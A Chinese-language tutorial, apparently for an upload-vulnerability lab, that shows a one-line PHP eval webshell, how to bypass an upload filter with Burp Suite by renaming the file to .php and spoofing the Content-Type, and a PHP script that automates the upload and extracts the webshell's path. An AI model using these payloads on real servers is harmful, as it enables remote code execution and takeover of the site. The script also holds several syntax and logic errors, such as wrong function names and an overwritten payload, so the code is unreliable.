1.访问暗月靶机系统,漏洞上传测试。
http://www.moontester.com/upload.php
2.一句话木马:<?php eval($_post['cmd']);?>
3.文件上传代码html
<html>
<head></head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
4.上传1.txt一句话图片木马,打开Burp Suit抓包
修改filename为1.php,修改Content-Type:image/gif、
可改用kali中的wireshark抓包,这个包才是最原始的包
使用php编写getshell 需要用到sockets拓展 确保php.ini开启socket
<?php
function http_send($host,$packet){
$sock=fsockopen($host,80)
if(!$sock){
print"\n[-] No response from {$host}:80 Trying again...";
$sock=fsockopen($host,80)
}
fput($sock,$packet);
while(!feof($sock)){
$resp.=fread($sock,1024);
}
fclose($sock);
return($resp);
}
function data($host,$filename){
$payload="---------------------------------------86531354118821\r\n"
$payload.="Content-Disposition:form-data; name='file';filename='{$filename}'\r\n";
$payload.="Content-Type:image/jpeg\r\n\r\n";
$payload.='GIF89a'."\r\n".'<?php eval($_POST[a])?>'."\r\n";
$payload.="---------------------------------------86531354118821\r\n"
$payload.="Content-Disposition:form-data; name='sub'";
$payload.="\r\n\r\n";
$payload.="12132\r\n";
$payload="---------------------------------------86531354118821--\r\n";
$packet="POST /upload.php HTTP/1.1\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Content-Type:multipart/form-data;boundary=---------------------86531354118821\r\n";
$packet.="Content-Length:".strlen($payload)."\r\n";
$packet."Connection:close\r\n\r\n";
$packet.=$payload;
return $packet;
}
$filename="moon.php";
$host="target_sys.com";
$html_str= print http_send($host,data($host,$filename));
}
?>
文件名
$filename="moon.php";
网址
$host="www.moontester.com";
输出上传后的内容
print http_send($host,data($host,$filename));
运行之后得到整个网页
cmd返回信息,有很多内容并不是想要的,所以要进行webshell的路径进行截取。返回所需的内容。
加上正则匹配语句:
pre_match("/stored in:(.*?)</",$html_str,$m);
if ($m[1]){
echo "http://".$host."/".$m[1];
}else{
echo "flase";
}
说明:pre_match这个是php里面的正则用来匹配或过滤内容
